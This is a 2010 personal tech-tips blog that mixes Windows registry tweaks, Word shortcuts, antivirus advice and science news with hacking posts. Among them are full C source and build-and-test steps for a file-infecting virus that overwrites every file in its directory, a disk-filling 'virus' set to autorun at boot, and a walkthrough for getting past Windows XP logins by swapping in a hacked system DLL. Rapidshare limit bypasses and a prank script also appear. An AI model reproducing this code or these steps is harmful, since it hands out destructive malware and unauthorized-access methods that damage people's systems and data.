Wednesday, March 31, 2010

Windows Media Player tricks

First, Click Start > Run > and type “regedit” to run Registry Editor.
Note: editing the registry may damage your system, please make a backup from your registry

To remove recent play list in history:
To remove recent files go to address: HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\RecentFileList
To remove recent URLs go to address: HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\RecentURLList
And delete play lists

To disable Upgrade message:
Go to following address: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MediaPlayer\PlayerUpgrade
Create a new String Value and name “AskMeAgain” and give value of NO


To hide anchor window:
When you are in skin mode, Windows Media Player displays Anchor window
To hide anchor window, go to address: HKEY_CURRENT_USER\Software\Policies\Microsoft\WindowsMediaPlayer
Create a new DWORD and name “DoNotShowAnchor” and give value of 1

To change title name:
Go to : HKEY_CURRENT_USER\Software\Policies\Microsoft\WindowsMediaPlayer
Create a new SRTING and type your name.


To lock applied skin:
Go to : HKEY_CURRENT_USER\Software\Policies\Microsoft\WindowsMediaPlayer
Create a new String with name of Default Skin for example 9SeriesDefault.wmz
Create a new DWORD and name “SetAndLockSkin” and give value of 1.

To enable DVD features:
Go to HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Settings
Create a new String and name “EnableDVDUI” and give value of YES.

To remove WMP features:
Go to : HKEY_CURRENT_USER\Software\Policies\Microsoft\WindowsMediaPlayer
Create a new DWORD and give value of 1 and name according to below
Media Favorite = NoMediaFavorite
Find New Station = NoFindNewStation
Radio Bar = NoRadiaBar

Automatically close non-responsive programs

 
With a small registry tweak, Windows XP can be set to automatically close any program that 'stops responding' (crashes), eliminating the need for you to use the task manager to close down the offending software manually.

To do this: 

Open REGEDIT and navigate to HKEY_CURRENT_USER\Control Panel\ Desktop

Modify the REG_SZ entry AutoEndTasks with a value of 1

Enjoy

Sunday, March 28, 2010

Under Water Thinking Robot

 
Canada has only three years to complete a deadline which is to compile enough evidence to support its claim to a vast Northern Territory in the Arctic. It has a critical mission, to map the sea floor in this area, and at a depth of up to 5 kilometers, there is enough pressure to crush a car to scrap metal, and kill a person long before that. How can they do this without risking life and limb?

In March of this year a small team will attempt to do just that. From an ice camp just above Borden island, over 4,000 kilometers from Toronto, they plan to launch a pioneer Autonomous unmanned vehicle, named Explorer. This six meter long, yellow torpedo shaped craft will be the first of it's kind to explore a dark and mountainous world in the deep Arctic Ocean, previously unseen until now. Creeping through the depths, Explorer will travel at the same speed as a fast canoe, and tell us so much about the Ocean floor.

Staying down up to four days at a time the Explorer with
be an extremely expensive trailblazer, all by itself, with no contact from the outside world if there is trouble. If there is turbulent currents, a massive sea mount, or even some curious animal, this AUV has to fend for itself. It will have to use pre-programmed wits, it will have to decide for itself what to do in case of an emergency. Then after all of that, as it comes to the surface with it's lithium-ion batteries quickly dwindling, it will also have to find it's masters floating somewhere on one of the ice platforms in the warming seas of the Arctic.

This 'little' excursion is one of the risky, but most ambitious missions that has ever left a submersible alone in such unforgiving seas. Only the most advanced electronics and navigational systems in the world could pull this off. Who might you ask is the creator of the Explorer? It is actually a firm in the small town of Port Coquitlam, in B.C. Located here is the International Submarine Engineering Ltd., a group of ten select companies who have been competing for submersible contracts around to globe, and who have over 250 of these vehicles under their belts, selling to Naval and scientific agencies in 20 countries, including Japan and the United States.

With president of the company James McFarlane, and long time submarine designer James Furguson as vice president, this company has kept up with the technologies of underwater robots for years. They have had some wins and some losses, but are determined to be the best in the business.

Take Over the Screen Saver

To activate and deactivate the screen saver whenever you want, goto the following registry key:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ScreenSavers

Now add a new string value and name it Mouse Corners. Edit this new value to -Y-N. Press F5 to refresh the registry. Voila! Now you can activate your screensaver by simply placing the mouse cursor at the top right corner of the screen and if you take the mouse to the bottom left corner of the screen, the screensaver will deactivate.

Shutdown and boot vista faster

Before we really get started, it is entirely possible to mess up your Vista install very royally if you don't know what you are doing. We recommend that only power users or those on the level of Sys Admins attempt these steps. Proceed at your own risk and always create a restore point before you modify any part of the system. All the programs used for purposes of this post are freeware applications.

Vista is not XP (thankfully) but like XP it has a lot of startup processes that are, well, pretty much useless. Though beware, you might actually need some of these if you are on a network or require remote assistance features. If not, then go ahead and turn them off.

Right click on Computer, go to manage and go to Services and Applications then Services (the Standard View makes it easier to manage but that is not a necessary step). You'll see a list of applications and services in this list, thing is, you don't need quite a few of them. Some may have already been disabled or are set to manual, that's fine, leave them like that, Vista has decided on its own they are not needed or will be activated when required.

We want to look at the ones that are set on Automatic. You can organize the list either by name or startup setting, for me, I have them organized by
name since it makes it easy to compare to other lists. I have used this process list for disabling items, each one is described for you so you can decide if you need it or not. Note that disabling the IKE and AuthIP Service will disable just about every single networking and network connection process on the computer. It serves you better NOT to disable it, you will still be able to connect to networks if you do but you want be able to monitor them or switch networks, best to leave that one on.

Here is list of services that are completely safe to disable (for most users):
Telephony (keep enabled if you use a modem)
SSDP Discovery
Shell Hardware Detection (disables autoplay events)
Server
Remote Access Connection Manager
Program Compatibility Assistant (face it, this service is useless, if you've ever tried it, you know what I'm talking about)
Portable Device Enumerator Service (if you use Windows Media Player with your MP3 device, keep this service on)
Perclilint
IPSec Policy Agent
IP Helper
Internet Connection Sharing (leave on if you have shared resources on a network)
Distributed Link Tracking Client
Diagnostic Policy Service (who pays attention to Windows Diagnostics anyway?)
Then there is msconfig, Vista users have the luxury of simply typing msconfig in the Start menu search box and launching it that way. Go to the Startup tab and select items you don't need, Java Update, Adobe Reader, any toolbars, iTunes helper and such are prime examples of things you can get rid of, they will start when/if they are needed. If you aren't sure about an entry, use a search engine to find out what the entry is.
If you don't want to use the built-in tools of Vista to do that then I recommend CodeStuff Starter, which has the msconfig features as well as the Management features so you can access everything from one program. CodeStuff also makes it easier to restore your system if you messed up.
It has been a dream of many to control exactly how their computer boots, granted msconfig, computer management and CodeStuff certainly make that process more manageable but it can get better and it does. Last on our list (but certainly not least) to tell Vista that you are the boss is Vista Boot Pro 3.1. The primary function of Vista Boot Pro 3.1 is to control the boot cycle if you have a second operating system installed, sure you could rely on the Vista Boot Loader but whats the fun in that?

Vista Boot Pro edits the Boot Configuration Files in the registry for you, without fail or flaw. The other way to edit the BCD file is well, to go into the registry and even I am leery about that.
Vista Boot Pro allows you to manage the Vista Boot Loader itself, edit which operating system boots first, configure the way Vista starts up and features its own Backup and Restore Center, just in case, you never know.

Vista Boot Pro is also available for Windows XP (Home, Pro, MCE 2005 and x64), Windows 2003 or Longhorn Server. Options may vary depending on operating system installed.
By disabling some processes and startup items, you are also on your way to a more secure installation of Vista but that's not everything you can do to maximize your Vista experience. This will be a continuing series of posts for optimizing Vista so stay tuned for the next one.

WARNING : FOR EDUCATIONAL PURPOSES ONLY.

Shortcut Keys For Microsoft Word (ms word)

 
You want to do much more with ms word in little time? so you need the short cut key?
Here i am going to share the spacial short cut keys of ms word so note down them and enjoy
Ctrl + A Select all contents of the page
Ctrl + B Bold highlighted selection
Ctrl + C Copy selected text
Ctrl + X Cut selected text
Ctrl + N Open new/blank document
Ctrl + O Open options
Ctrl + P Open the print window
Ctrl + F Open find box
Ctrl + I Italicize highlighted selection
Ctrl + K Insert link
Ctrl + U Underline highlighted selection
Ctrl + V Paste
Ctrl + Y Redo the last action performed
Ctrl + Z Undo last action
Ctrl + G Find and replace options
Ctrl + H Find and replace options
Ctrl + J Justify paragraph alignment
Ctrl + L Align selected text or line to the left
Ctrl + Q Align selected paragraph to the left
Ctrl + E Align selected text or line to the center
Ctrl + R Align selected text or line to the right
Ctrl + M Indent the paragraph
Ctrl + T Hanging indent
Ctrl + D Font options
Ctrl + Shift + F Change the font
Ctrl + Shift + > Increase selected font +1
Ctrl + ] Increase selected font +1
Ctrl + Shift + < Decrease selected font -1
Ctrl + [ Decrease selected font -1
Ctrl + Shift + * View or hide non printing characters
Ctrl + f Move one word to the left
Ctrl + g Move one word to the right
Ctrl + h Move to beginning of the line or paragraph

Ctrl + i Move to the end of the paragraph
Ctrl + Del Delete word to right of cursor
Ctrl + Backspace Delete word to left of cursor
Ctrl + End Move cursor to end of document
Ctrl + Home Move cursor to beginning of document
Ctrl + Space Reset highlighted text to default font
Ctrl + 1 Single-space lines
Ctrl + 2 Double-space lines
Ctrl + 5 1.5-line spacing
Ctrl + Alt + 1 Change text to heading 1
Ctrl + Alt + 2 Change text to heading 2
Ctrl + Alt + 3 Change text to heading 3
F1 Open help
Shift + F3 Change case of selected text
Shift + Insert Paste
F4 Repeat last action performed (Word 2000+)
F7 Spell check selected text and/or document
Shift + F7 Activate the thesaurus
F12 Save as
Ctrl + S Save
Shift + F12 Save
Alt + Shift + D Insert the current date
Alt + Shift + T Insert the current time
Ctrl + W Close document
If You are facing any problem please submit it via comment i will give answer to you
Upcoming Tricks:-
Short Cut Keys of the EXCEL
Short Cut Keys of the OUTLOOK
So keep visiting for more

Rapidshare Hack For Firefox Users Only

 
The hot new Firefox plug-in takes browser customization to a whole new level by letting users filter site content or change page behaviors.
The glory of open-source software is that it allows anyone with the inclination and the scripting knowledge to get under the hood and hot-rod their computing environment.
But most of the time, that advantage is available only to people with the programming skills to make the changes they want.

That's where Greasemonkey, a free plug-in for Firefox, comes in -- it simplifies hacking the browser.

Released at the end 2004, Greasemonkey is the latest in a growing arsenal of Firefox customization tools.
It changes how Web pages look and act by altering the rendering process.


http://greasemonkey.mozdev.org/

1) Install the Greasemonkey extension....
http://downloads.mozdev.org/greasemonkey/greasemonkey_0.2.6.xpi
2) Restart Firefox
3) Go to http://rapidshare.de/files/1034529/rapidshare.user.js.html
4) Right click on rapidshare.user.js and choose "Install User Script".
5) Run FireFox.
6) From 'File' Menu click on Open File then browse to whereever you saved the 'greasemonkey.xpi' plug-in.
Open it, wait a couple seconds for the install button becomes active.
7) Click on it to install this plug-in then CLOSE FIREFOX.
8) Run FireFox again.
From the File Menu click on Open File then browse to whereever you saved the 'rapidshare.user.js'.
9) Open it.
10) Click the Tools Menu then click on Install User Script then click OK.
11) Close FireFox.

The script will let you enjoy "no wait" and multiple file downloads......!

WARNING : FOR EDUCATIONAL PURPOSES ONLY .

Saturday, March 27, 2010

Rapidshare Hack

 
Rapidshare traces the users IP address to limit each user to a certain amount of downloading per day.
To get around this, you need to show the rapidshare server a different IP address.
Here are some methods for doing this-

A] Short-Out the JavaScript:
1) Goto the page you want to download
2) Select FREE button
3) In the address bar put this- javascript:alert(c=0)
4) Click OK
5) Click OK to the pop-up box
6) Enter the captcha
7) Download Your File

B] Request a new IP address from your ISP server:
Here’s how to do it in windows:
1) Click Start
2) Click run
3) In the run box type cmd.exe and click OK
4) When the command prompt opens type the following. ENTER after each new line.
ipconfig /flushdns
ipconfig /release
ipconfig /renew
exit
5) Erase your cookies in whatever browser you are using.
6) Try the rapidshare download again.
Frequently you will be assigned a new IP address when this happens.
Sometime you will, sometimes you will not. If you are on a fixed IP address, this method will not work.
If this works for you, you may want to save the above commands into a batch file, and just run it when you need it.



C] Use a proxy with SwitchProxy and Firefox:
1) Download and install Firefox
2) Download and install SwitchProxy
3) Google for free proxies
4) When you hit your download limit, clean your cookies and change your proxy

D] You can use a bookmarklet to stop your wait times:
1) Open IE
2) Right Click On This Link
3) Select Add to Favorites
4) Select Yes to the warning that the bookmark may be unsafe.
5) Name it “RapidShare No Wait”
6) Click on the Links folder (if you want to display it in your IE toolbar)
7) Click OK
8) You may need to close and reopen IE to see it
9) Goto rapidshare and click the bookmarklet when you are forced to wait

WARNING : FOR EDUCATIONAL PURPOSES ONLY.

Fake Orkut Hack

 
Copy and paste below code in the address bar of your browser and press enter.
It shows that your orkut account is hacked. But this is not true. Its just for fun.Try sending this link in chat rooms and scraps so that you can have some fun

CODE:
javascript:function reverse() { var inp = " ! dekcah si tnuocca tukrO ruoY "; var outp="";for (i = 0; i <= inp.length; i++) { outp =inp.charAt (i) + outp;}alert(outp) ;}; reverse();

WARNING : FOR EDUCATIONAL PURPOSES ONLY.

Make XP or Vista Faster With A Simple Trick

Pagefile.sys is a windows system file which acts as a virtual memory extension of a computer’s real memory RAM. By default, pagefile.sys is set to the same size as your actual physical memory size and might consume a huge disk space of your computer hard drive space. When physical RAM is fully used and there is need for more memory, information/data not currently being accessed can be ’swapped’ to that location and thus free physical RAM for immediate use. That same data can be transferred back if need be, into physical RAM at any time.

There are some easy ways to just turn off Paging file generation, but for systems lesser than 512MB RAM, it would mean disaster. hence I do not recommend turning off the Paging file generation. As mentioned before, assuming you have enough hard disk space to spare, you can convert that space to speed and improve the performance of your Windows XP/Vista. You must have guessed it by now. the trick is to increase the size of pagefile.sys, thereby giving your PC morevirtual memory to use

JUST FOLLOW THESE STEPS
1. Know the size of the RAM installed on your computer by right clicking on My Computer and choosing Properties.

2. Go to Control Panel and run System.
3. Click on Advanced tab and click the Settings button on Performance.
4. Click on Advanced tab again and click on the Change button
5. Select “Custom Size”. Give the Initial size and Maximum size as 1.5 times your RAM size.
6. Restart the computer for the changes to take effect.
You are Done!

WARNING : FOR EDUCATIONAL PURPOSES ONLY.

How to make Internet Faster

 
Want To Make Internet Faster?
for dial up connection try the simple step which are given below :

1. click start->run
2. type regedit->enter
3. browse folder HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ InternetSettings
4. right click @ windows right->New->DWORD
5. type MaxConnectionsPerServer->;you can set value (the higher the number, the more good speed you get, eg : 99)
6. create another DWORD->type MaxConnectionsPer1_0Server
7. then put a high value as mentioned above
8. then, restart IE, finished.

WARNING : FOR EDUCATIONAL PURPOSES ONLY.

Major Component Designed For Hydrogen Cars

 
Researchers have completed work on a crucial component for an experimental hydrogen storage system for cars, part of efforts to reduce pollution and the use of fossil fuels in transportation.


The system uses a fine metal powder to absorb hydrogen gas under high pressure. When the powder absorbs hydrogen, it becomes a "metal hydride," and the process is called "hydriding." By then decreasing the pressure in the vessel or warming the metal hydride, the hydrogen can be released to drive a fuel cell or engine.


A complication in perfecting the technology, however, is that the hydriding process generates heat, which hinders the absorption process and prevents the hydrogen storage vessel from being filled rapidly, said Issam Mudawar, a Purdue University professor of mechanical engineering who is leading the work with research assistant professor Timothée Pourpoint and doctoral student Milan Visaria.


"If you're driving your hydrogen car, you can't wait an hour at the filling station," Mudawar said. "For this system to be practical, you have to be able to cool the hydride efficiently so that the storage vessel can be filled within five minutes with enough fuel to drive 300 miles."


The researchers have made progress in solving the problem by designing, building and testing the system's heat exchanger and circulating coolant through tubes to remove heat and speed hydrogen storage, Mudawar said.


In February, Eric Lynch, innovation strategy manager for the Purdue Research Foundation’s Office of Technology Commercialization, filed a final patent on the engineers’ behalf for the heat exchanger, a coil of stainless steel tubing that fits inside a hydrogen storage "pressure vessel" 4 inches in diameter. Standard automotive coolant is circulated through the tubing.




Such a storage technology could help make hydrogen cars a reality if other researchers are successful in developing improved alloys for hydriding and better fuel cells, which generate electricity to power an electric motor. The hydrogen also could be burned instead of gasoline in internal combustion engines.


Due to space constraints, it is essential that the heat exchanger occupy the least volume possible inside the storage vessel. Using a theoretical model they developed, the researchers determined how to precisely position the tubing so that no fins are needed to dissipate heat.


Eliminating the fins reduces the cost, weight and size of the heat exchanger, Mudawar said.


The researchers designed a system that occupies the least space possible while also properly cooling the hydride. Whereas an earlier prototype occupied 30 percent of the vessel, leaving 70 percent for the metal hydride, the new design occupies 7 percent, leaving 93 percent for the hydride.


"The idea behind this latest design is to provide the coolant as close as possible to the hydride while eliminating the need for bulky heat spreading components like fins," Mudawar said. "The main advantages of this design are simplicity and flexibility. It can easily be adapted depending on cooling and size requirements."

The work was conducted in Purdue's Hydrogen Systems Laboratory at the university's Maurice J. Zucrow Laboratories.

How To Create A Logon Banner

If you want to create a Logon Banner: A message box to appear below your logon on.

1.Open RegEdit

2.Go To
For Windows 9x and ME -
HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Winlogon

For Windows 2000 XP 2003 Vista -
HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Winlogon


3.Create a new String value"LegalNoticeCaption "

4. Enter the Title of the window. What is displayed in the Title Bar.

5. Create a new string value "LegalNoticeText"

6. Enter the text for your message box that will appear even before the Logon window.

WARNING : FOR EDUCATIONAL PURPOSES ONLY

How to change your IP address to new IP address

 
You can surf anonymously after changing the ip address so that the risk of getting hacked is less.Steps involved in changing the ip address.
1.Click run
2.Type "cmd" and press "enter"
3.type "ipconfig/release" and press "enter"
4.Type "exit" and press "enter"
5. click "Network connections" in your control panel
6.select local area connection and click properties
7.Double click "TCP/IP" under "general tab".
8.select "Use the following ip address"
9.Type any numbers until the area get filled.
10.Click "TAB" so that it will automatically fill the Subnet Mask
11.click ok
12.again click ok
13.Repeat steps 6 and 7
14.select "obtain ip address automatically"
15.click ok
16.Now YOu have a new ip address
17.Enjoy safe surfing with a new ip address

OR

visit any proxy sites
some useful sites proxy sites that hide your ip address are
a)proxy4free
b)proxy
c)prospector
d)turbohide

Warning : FOR EDUCATIONAL PURPOSES ONLY

How to Make Animation with Microsoft PowerPoint

 
1)Open Powerpoint and create a new presentation. Make a blank slide and set the transition to advance after .1 seconds. Click Apply to all
2)Draw the first frame of your animation. this one is important - it is the frame that all of the other frames in this scene will be based on. Take your time with it.
3)Duplicate the slide, and make a very slight change in this slide for the progress of the animation. If you had a ball falling, make it go down one or two places. (Note: Powerpoint doesn't use actual pixels, but a slightly larger placement system. Think of it as an invisible graph.)
4)Duplicate the new slide and keep going. For things like gravity, make the motion stronger each time, eg, changing it more and more. The most catastrophic thing is to make things go too fast,s o don't be afraid to take a lot of slides to do one thing - you can always delete them later.
5)Preview your presentation constantly, changing anything you think needs to be changed. Erase unneeded slides and such, add or delete details until your presentation is perfect.
6)Add in sounds and other details, then make a beginning and ending slide, maybe even an opening sequence.
7)You're done! If you want, you can even turn it into a flash movie using Wink.

12 Tips to Maintain a Virus Free Computer

 
Is your computer infected with virus? Do you often get mysterious error messages? Well this is a common problem faced by almost all the computer users across the globe. There are many viruses and worms out there that could infect your computer. Some are harmless, but, they do have the capacity to do any number of nasty things, up to and including, erasing all data from your computer. However there are ways to keep viruses away from your PC. Here are the 12 tips to maintain a virus free computer.

1. Email is one of the common ways by which your computer can catch a virus. So it is always recommended to stay away from SPAM. Open only those emails that has it’s origin from a trusted source such as those which comes from your contact list. If you are using your own private email host (other than gmail, yahoo, hotmail etc.) then it is highly recommended that you use a good anti-spam software. And finally NEVER click on any links in the emails that comes from untrusted sources.

2. USB thumb/pen drives is another common way by which viruses spread rapidly. So it is always a good habit to perform a virus scan before copying any data onto your computer. NEVER double-click the pen drive to open it. Instead right-click on it and select the option “open”. This is a safe way to open a pen drive.

3. Be careful about using MS Outlook. Outlook is more susceptible to worms than other e-mail programs, unless you have efficient Anti-Virus programs running. Use Pegasus or Thunderbird (by Mozilla), or a web-based program such as Hotmail or Yahoo (In Firefox).

4. As we all know, Internet is the main source of all the malicious programs including viruses, worms, trojans etc. In fact Internet contributes to virus infection by up to 80%. So here are the tips for safe surfing habits so that you can ward off virus infection up to the maximum extent.

* Don’t click on pop-up windows that announce a sudden disaster in your city or announce that you’ve won an hourly prize. They are the ways to mislead Internet users and you should never trust them.
* You can also use a pop-up blocker to automatically block those pop-ups.

5. Most of us use search engines like Google to find what we are looking for. It is quite obvious for a malicious website to get listed in the search results. So to avoid visiting those untrusted malicious websites, you can download and install the AVG LinkScanner which is a freeware. This tool can become very handy and will help you to stay away from malicious websites.

6. Install a good antivirus software and keep it updated. Also perform full system scan periodically. It is highly recommended that you turn on the automatic update feature. This is the most essential task to protect your PC from virues. If PC security is your first option then it is recommended that you go for a shareware antivirus software over the free ones. Most of the antivirus supports the Auto-Protect feature that provides realtime security for your PC. Make sure that this feature is turned on.

7. Install a good Antispyware program, that operates against Internet malware and spyware.

8. Never open any email attachments that come from untrusted sources. If it is a picture, text or sound file (these attachments end in the extensions .txt, .jpeg, .gif, .bmp, .tif, .mp3, .htm, .html, and .avi), you are probably safe, but still do a scan before opening.

9. Do not use disks that other people gave you, even from work. The disk could be infected with a virus. Of course, you can run a virus scan on it first to check it out.

10. Set up your Windows Update to automatically download patches and upgrades. This will allow your computer to automatically download any updates to both the operating system and Internet Explorer. These updates fix security holes in both pieces of software.

11. While you download files from untrusted websites/sources such as torrents, warez etc. make sure that you run a virus scan before executing them.

12. And finally it is recommended not to visit the websites that feature illegal/unwanted stuffs such as cracks, serials, warez etc. since they contribute much in spreading of viruses and other malicious programs.

How to Create a Computer Virus?

 
This program is an example of how to create a virus in c.This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file.Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on.Here’s the source code of the virus program.


#include
#include
#include
#include
#include
#include

FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;

void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}

COMPILING METHOD:

BORLAND TC++ 3.0 (16-BIT):

1. Load the program in the compiler, press Alt-F9 to compile

2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)

3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)

4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)

5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect

BORLAND C++ 5.5 (32-BIT) :

1. Compile once,note down the generated EXE file length in bytes

2. Change the value of X in source code to this length in bytes

3. Recompile it.The new EXE file is ready to infect

HOW TO TEST:

1. Open new empty folder

2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)

3. Run the virus EXE file there you will see all the files in the current directory get infected.

4.All the infected files will be ready to reinfect

That’s it

WARNING: FOR EDUCATIONAL PURPOSES ONLY

How to design high quality a Logo

 
Can you design a professional logo under 10 minutes using Photoshop? One of the biggest problems entrepreneurs have when starting a website online is doing something to make their website stand out. Every website you start should be unique in some way – content wise, design wise or something else.
If you look at most of the big websites online, they have high quality content as well as a high quality design. An example is Quick Online Tips – the design is well laid out, content is easy to read, the logo stands out and sets it apart from the other blogs in the niche.
Now, one of the first things you’ll want to do when you start your website is get a nice brandable logo, especially in non-tech niches. For your average visitor, a brandable, fresh logo can help them remember your website and there’s a greater chance of visiting assuming your content and design are up to scratch. Think of it this way – you have the chance of visiting Blog A or Blog B, both of which had high quality content. However, Blog A has a high quality logo whereas Blog B does not – which are you more likely to visit and remember?
If you have multiple sites, especially start-ups, and no design skills, outsourcing logos can get expensive. The minimum you’d expect to pay for a logo is around ten dollars, while prices can go up to hundreds of dollars if you’re looking for something really high quality. When starting though, you’ll want to keep your costs as low as possible – this post will teach you how to create a high quality logo in ten minutes or less, as well as show you an example. I recommend you create your logo on a transparent background in Photoshop so you can directly apply it to your website.
1. Getting a high quality image
Although you can have a plain text logo, it’ll stand out more if your visitors can associate an image with your website. To find an image you can use, simply Google “free icons” and you’ll find a lot of websites you can use.
One of my favourites is Icon Finderwhich allows you to search icons (and filter to show only those which allow commercial use). IconFinder has over 150,000 icons you can look through so you should find something for any niche.
2. Choosing a high quality font
Using a high quality font is just as important as the image you decide to use. Two of my favorites are Calibri and MS Sans Serif, but again, Google will help you find lots of fonts you can use. A good list of fonts (over 100) that you can play around with can be found at Instant Shift – there are some very nice ones there.
You want your font to be easy to read as well as look professional and stand out from the traditional fonts. Try not to use ones that are too common like Times New Roman or Arial – there are hundreds of free fonts out there, so pick one that’s unique!
3. Applying effects
You could find a font and paste it next to a logo, but that probably won’t give you the look you want. To make your logo look professional and fit your website, you’ll want to apply some effects. Three effects you could use are:
Gradient: A gradient is basically where your logo goes from light to dark (or vice versa). You can apply the gradient effect to just your image, just your font or to both.
Reflection: When the Web 2.0 craze started many websites were using reflections in their logos. This is slightly less common now, but it can still look nice if done correctly.
Shading: You can apply a shading effect to the borders of your logo, giving your text a more embellished look. Something else you could do is apply a shadow effect to the image used in your logo – this will help it stand out.
Here’s an example of a logo created using the above method. Time taken? Seven minutes.

The bottom line is that making a simple logo is not as difficult as it sounds, even for those that are not good at design. Play around Photoshop – there are dozens of fonts, images and effects you can try and after a bit of practice you’ll be creating high quality logos in no time!

How to Hack Into a Windows(without changing Password)

There is a far better way to get into Windows XP. It is easy and it does not reset the password. Hack into a computer running Windows XP without changing the password and find out all and any passwords on the machine (including admin accounts). You do not need access to any accounts to do this. Of course, do not do this on anyone elses computer without proper authorisation.

1. Get physical access to the machine. Remember that it must have a CD or DVD drive.
2. Download DreamPackPL HERE
3. Unzip the downloaded dreampackpl.zip and you'll get dreampackpl.ISO.
4. Use any burning program that can burn ISO images.
5. After you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files.
6. Press "R" to install DreamPackPL.
7. Press "C" to install DreamPackPL by using the recovery console.
8. Select the Windows installation that is currently on the computer (Normally is "1" if you only have one Windows installed)
9. Backup your original sfcfiles.dll by typing:
"ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld" (without quotes)
10. Copy the hacked file from CD to system32 folder. Type:
"copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll" (without quotes and assuming your CD drive is D:)
11. Type "exit", take out disk and reboot.
12. In the password field, type "dreamon" (without quotes) and DreamPack menu will appear.
13. Click the top graphic on the DreamPack menu and you will get a menu popup.
14. Go to commands and enable the options and enable the god command.
15. Type "god" in the password field to get in Windows.

You can also go to Passwords and select "Logon with wrong password and hash". This option allows you to login with ANY password.

Hack and Increase Internet Speed

 
If you are running a non server based windows OS, your maximum concurrent connection is limited by default to 10. You may change this limit to several million but in doing so you are violating your agreement with Microsoft.

For educational purposes, here is a link to a patch that can change your concurrent connection limit:
http://www.lvllord.de/download.php?url=e…

You may find more information on how this patch works on their website:
http://www.lvllord.de

You may also want to go into your bittorrent clients settings and raise the maximum connections here as well.

Making A simple virus in C for Beginners

 
Hi everybody,at begining of the learning of computer programming it is a dream of almost all student to build a computer virus of his/her own.
Computer virus obviously is a thing that shouldnot be made and used on others computer it is completely illegal in all countries.So make and try this on your own machine.
Now let me explain what do the viruses do.There are several types of computer viruses with different functions(destructive obviously).Some of which delete computers' important files and folders,some change the configuration of your computer system like registry values,some occupy and engulf a large amount of memory space and dump your hard disc.There are some viruses too which can damage your RAM parmanently.
I am going to give here a simple virus program which has only a few lines bur has ability to jam your Hard disc.
The logic behind the program is nothing but making a self growing file which grows to a few MB in one tern and this growth will continue infinitely.
The require ment to make this virus is
OS:-Windows98/xp/2000 MS-DOS
Compiler:-Borland C(Which has Dos Shell)
Source Code:-
//START v.c
#include
#include
void main()
{
while(1)
{
system("dir>>â•Å¡a.exe");
}
}
//END

As you can see this is a very little programe.Compiling the programme we get v.exe file.This is our virus.
How it works?-The system call "dir>>â•Å¡a.exe" will execute the dos command 'dir' and ridirect its output toa file â•Å¡a.exe(the symbol â•Å¡ can be obtained by pressing 456 on numpad holding alt key).So running the program in a folder having many files and folder will increase the size of â•Å¡a.exe in a great amount.This process will continue to infinity as this is in a while(1) loop;
Best try this on win98.then you cannot delete â•Å¡a.exe from GUI.
For auto running place v.exe in the command folder in windows folder.
In autoexec.bat(win98) or autoexec.NT(winXP/2000) file simply write v.exe.
Each time your window starts v.exe will run automatically.
Try this on your own computer remember the â•Å¡a.exe is the infected file which is growing in size continiously.So to recover, simply delete v.exe and â•Å¡a.exe file from your computer.
For more informaton or any problem please write me.

How to disable Windows XP Boot logo

 
It is possible to disable the XP splash screen, which will slightly speed up the overall boot process. Be aware that removing the splash screen will also cause you not to see any boot-up messages that might come up (chkdsk, convert … ), but if your system runs without any problems then it should not matter.
• Edit boot.ini.
• Add ” /noguiboot” right after “/fastdetect”.
Upon restarting, the splash screen will be gone. It can be re-enabled by removing the new switch.

How To Disable Detection of USB Storage Device

 
Many official users are worried for unauthorized access through USB storage devices like pen drive (USB HDD and others) .Sometimes in the offices, your office members implement viruses and access your secured data through USB storage device. Generally this unpleasant incident is detrimental for the Software programmers and designers.

To solve this issue implement these steps:

1. Click Start → Run and type regedit.

2. Scroll Down to following registry keys-

[HKEY_LOCAL_MACHINE \SYSTEM\CurrentControlSet \Services\UsbStor]
3.Double click →start
4. Set value data: 4 as mentioned above, to activate service of USB DISABLING mode and then restart your computer or logoff and then logon on your system.

5. For deactivation Set value data : 3 then restart your computer or logoff and then logon on your system.

Facebook-Share your album with selected friends

 
If you want to share your profile picture with only selected friends for some reason so you can done it with this tip so just follow the simple steps for it as shown below
First go to the album privacy page. You can access this page by Settings->Privacy Settings->Profile->Edit Photo Album Privacy Settings.
on that page you can see all your Facebook albums including Wall Photos and Mobile Uploads
Select the album which you want to set visible to selected friends only.
Now click on customize… under Who can see this?

Now in the pop-up select some friends and start typing your friends name who all can see that particular album

Now your album will be visible to selected friends only.
Enjoy